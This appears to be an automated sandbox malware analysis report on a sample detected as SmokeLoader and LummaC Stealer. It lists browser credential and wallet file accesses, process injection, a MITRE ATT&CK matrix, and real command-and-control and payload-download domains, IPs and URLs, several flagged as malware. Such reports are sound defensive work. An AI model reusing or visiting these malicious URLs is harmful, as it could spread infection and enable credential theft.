                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000007.ldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4268, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7108, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.984079448.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4268, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7108, type: MEMORYSTR
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 0.2.file.exe.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.wfshtit.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.886072573.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.940635525.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F03A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,10_2_6F03A0C0

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		Exfiltration Over Other Network Medium14
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts612
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		12
                  File and Directory Discovery                  		Remote Desktop Protocol21
                  Data from Local System                  		Exfiltration Over Bluetooth21
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager34
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		Automated Exfiltration4
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Software Packing                  		NTDS531
                  Security Software Discovery                  		Distributed Component Object Model1
                  Input Capture                  		Scheduled Transfer125
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets231
                  Virtualization/Sandbox Evasion                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  DLL Side-Loading                  		Cached Domain Credentials13
                  Process Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  File Deletion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                  Masquerading                  		Proc Filesystem1
                  Remote System Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)231
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)612
                  Process Injection                  		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Hidden Files and Directories                  		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1318864 Sample: file.exe Startdate: 03/10/2023 Architecture: WINDOWS Score: 100 45 rosatiauto.com 2->45 47 gudintas.at 2->47 75 Snort IDS alert for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 8 other signatures 2->81 9 file.exe 2->9         started        12 wfshtit 2->12         started        signatures3 process4 signatures5 95 Detected unpacking (changes PE section rights) 9->95 97 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->97 99 Maps a DLL or memory area into another process 9->99 109 2 other signatures 9->109 14 explorer.exe 6 8 9->14 injected 101 Antivirus detection for dropped file 12->101 103 Multi AV Scanner detection for dropped file 12->103 105 Machine Learning detection for dropped file 12->105 107 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->107 process6 dnsIp7 61 189.232.58.103, 49822, 49914, 49924 UninetSAdeCVMX Mexico 14->61 63 186.13.17.220, 49927, 49930, 80 TechtelLMDSComunicacionesInteractivasSAAR Argentina 14->63 65 9 other IPs or domains 14->65 37 C:\Users\user\AppData\Roaming\wfshtit, PE32 14->37 dropped 39 C:\Users\user\AppData\Local\Temp\BB04.exe, PE32 14->39 dropped 41 C:\Users\user\AppData\Local\Temp\46A3.exe, PE32 14->41 dropped 43 C:\Users\user\...\wfshtit:Zone.Identifier, ASCII 14->43 dropped 67 System process connects to network (likely due to code injection or exploit) 14->67 69 Benign windows process drops PE files 14->69 71 Deletes itself after installation 14->71 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->73 19 BB04.exe 1 14->19         started        22 46A3.exe 2 14->22         started        file8 signatures9 process10 file11 83 Antivirus detection for dropped file 19->83 85 Multi AV Scanner detection for dropped file 19->85 87 Machine Learning detection for dropped file 19->87 25 AppLaunch.exe 12 19->25         started        29 WerFault.exe 10 19->29         started        31 conhost.exe 19->31         started        35 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 22->35 dropped 89 Writes to foreign memory regions 22->89 91 Allocates memory in foreign processes 22->91 93 Injects a PE file into a foreign processes 22->93 33 RegAsm.exe 12 22->33         started        signatures12 process13 dnsIp14 49 malenursenect.fun 104.21.1.18, 49840, 49844, 49853 CLOUDFLARENETUS United States 25->49 51 172.67.151.219, 49846, 49849, 49855 CLOUDFLARENETUS United States 25->51 53 farformafor.fun 25->53 111 Tries to harvest and steal browser information (history, passwords, etc) 25->111 55 104.21.81.17, 49845, 49854, 49856 CLOUDFLARENETUS United States 33->55 57 fiancejiveimp.fun 172.67.137.125, 49830, 49832, 49834 CLOUDFLARENETUS United States 33->57 59 fullppc.xyz 33->59 113 Query firmware table information (likely to detect VMs) 33->113 115 Performs DNS queries to domains with low reputation 33->115 117 Found many strings related to Crypto-Wallets (likely being stolen) 33->117 signatures15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe34%ReversingLabs
                  file.exe100%AviraHEUR/AGEN.1312455
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\wfshtit100%AviraHEUR/AGEN.1312455
                  C:\Users\user\AppData\Local\Temp\BB04.exe100%AviraTR/AD.Nekark.yeqin
                  C:\Users\user\AppData\Local\Temp\46A3.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\wfshtit100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\BB04.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\BB04.exe58%ReversingLabsWin32.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
                  C:\Users\user\AppData\Roaming\wfshtit34%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.mi0%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
                  http://ns.adob0%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://rosatiauto.com/tmp/0%URL Reputationsafe
                  http://kingpirate.ru/tmp/100%URL Reputationmalware
                  http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
                  http://pik96.ru/tmp/100%URL Reputationmalware
                  http://gudintas.at/tmp/100%URL Reputationmalware
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  https://java.sun.com0%URL Reputationsafe
                  http://malenursenect.fun/rLDbMMUlr2VHY/t/100%Avira URL Cloudmalware
                  fiancejiveimp.fun0%Avira URL Cloudsafe
                  http://malncejiveimp.fun/0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/apiY70%Avira URL Cloudsafe
                  http://malenursenect.fun/dz100%Avira URL Cloudmalware
                  http://fiancejiveimp.fun/apiI0%Avira URL Cloudsafe
                  http://malenursenect.fun/Sz#100%Avira URL Cloudmalware
                  http://malenursenect.fun/apixJ100%Avira URL Cloudmalware
                  http://fiancejiveimp.fun/apilv0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/50%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/api0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun//0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/00%Avira URL Cloudsafe
                  http://malenursenect.fun/vf100%Avira URL Cloudmalware
                  http://malenursenect.fun100%Avira URL Cloudmalware
                  http://h170811.srv22.test-hf.su/186.exe100%Avira URL Cloudmalware
                  http://malenursenect.fun/api100%Avira URL Cloudmalware
                  http://metro.mahapps.com/winfx/xaml/iconpacks0%Avira URL Cloudsafe
                  https://kingpirate.ru/tmp/100%Avira URL Cloudmalware
                  http://malenursenect.fun/apip7100%Avira URL Cloudmalware
                  http://malenursenect.fun/5u100%Avira URL Cloudmalware
                  http://malenursenect.fun/t100%Avira URL Cloudmalware
                  http://schemas.micr0%Avira URL Cloudsafe
                  http://malenursenect.fun/100%Avira URL Cloudmalware
                  http://malenursenect.fun/api)100%Avira URL Cloudmalware
                  http://malenursenect.fun/apillj100%Avira URL Cloudmalware
                  http://193.149.185.139/ofdskiewerews/update.exe0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/a0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun:80/api0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/i0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/apil0%Avira URL Cloudsafe
                  fullppc.yz0%Avira URL Cloudsafe
                  http://fiancejiveimp.fun/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  gudintas.at
                  		211.40.39.251
                  		truetrue
                    		unknown
                    malenursenect.fun
                    		104.21.1.18
                    		truetrue
                      		unknown
                      kingpirate.ru
                      		172.67.171.76
                      		truetrue
                        		unknown
                        fiancejiveimp.fun
                        		172.67.137.125
                        		truetrue
                          		unknown
                          h170811.srv22.test-hf.su
                          		91.227.16.22
                          		truetrue
                            		unknown
                            rosatiauto.com
                            		unknown
                            		unknowntrue
                              		unknown
                              pik96.ru
                              		unknown
                              		unknowntrue
                                		unknown
                                farformafor.fun
                                		unknown
                                		unknowntrue
                                  		unknown
                                  fullppc.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    fiancejiveimp.funtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://h170811.srv22.test-hf.su/186.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://malenursenect.fun/apitrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://fiancejiveimp.fun/apitrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://kingpirate.ru/tmp/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://rosatiauto.com/tmp/true
                                    • URL Reputation: safe
                                    		unknown
                                    http://kingpirate.ru/tmp/true
                                    • URL Reputation: malware
                                    		unknown
                                    http://pik96.ru/tmp/true
                                    • URL Reputation: malware
                                    		unknown
                                    http://gudintas.at/tmp/true
                                    • URL Reputation: malware
                                    		unknown
                                    http://193.149.185.139/ofdskiewerews/update.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    fullppc.yztrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://fiancejiveimp.fun/apiIRegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://malenursenect.funAppLaunch.exe, 0000000F.00000002.1069988032.000000000529A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://duckduckgo.com/chrome_newtabRegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://malenursenect.fun/rLDbMMUlr2VHY/t/AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.miexplorer.exe, 00000001.00000000.898450898.000000000EA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.sectigo.com046A3.exe.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://malenursenect.fun/Sz#AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000001.00000000.899052492.00007FFA11519000.00000002.00000001.01000000.00000005.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://malncejiveimp.fun/RegAsm.exe, 0000000B.00000002.1050683649.0000000000EAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleRegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://metro.mahapps.com/winfx/xaml/iconpacks46A3.exe, 0000000A.00000000.981708915.0000000000332000.00000002.00000001.01000000.00000007.sdmp, 46A3.exe.1.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fiancejiveimp.fun/apiY7RegAsm.exe, 0000000B.00000002.1050683649.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://malenursenect.fun/dzAppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.google.com/search?q=.netAppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://ns.adobexplorer.exe, 00000001.00000000.897282890.0000000002E89000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://malenursenect.fun/apixJAppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://www.google.comAppLaunch.exe, 0000000F.00000002.1069988032.0000000005246000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://fiancejiveimp.fun//RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fiancejiveimp.fun/apilvRegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fiancejiveimp.fun/0RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/intl/en_uk/chrome/RegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://malenursenect.fun/vfAppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3DAppLaunch.exe, 0000000F.00000002.1070510652.000000000763F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://fiancejiveimp.fun/5RegAsm.exe, 0000000B.00000002.1050683649.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://malenursenect.fun/apip7AppLaunch.exe, 0000000F.00000002.1069988032.0000000005246000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://malenursenect.fun/tAppLaunch.exe, 0000000F.00000002.1070510652.0000000007590000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://malenursenect.fun/5uAppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://malenursenect.fun/AppLaunch.exe, 0000000F.00000002.1069988032.00000000052A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://sectigo.com/CPS046A3.exe.1.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DARegAsm.exe, 0000000B.00000002.1051024783.000000000347D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1051397448.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.000000000764B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://malenursenect.fun/apilljAppLaunch.exe, 0000000F.00000002.1070510652.00000000075B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000001.00000000.899052492.00007FFA11519000.00000002.00000001.01000000.00000005.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://fiancejiveimp.fun/aRegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&AppLaunch.exe, 0000000F.00000002.1070510652.000000000763F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1070510652.0000000007658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://malenursenect.fun/api)AppLaunch.exe, 0000000F.00000002.1070510652.00000000075B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://schemas.micrexplorer.exe, 00000001.00000000.898450898.000000000EA70000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.ecosia.org/newtab/RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=RegAsm.exe, 0000000B.00000002.1051397448.0000000003619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
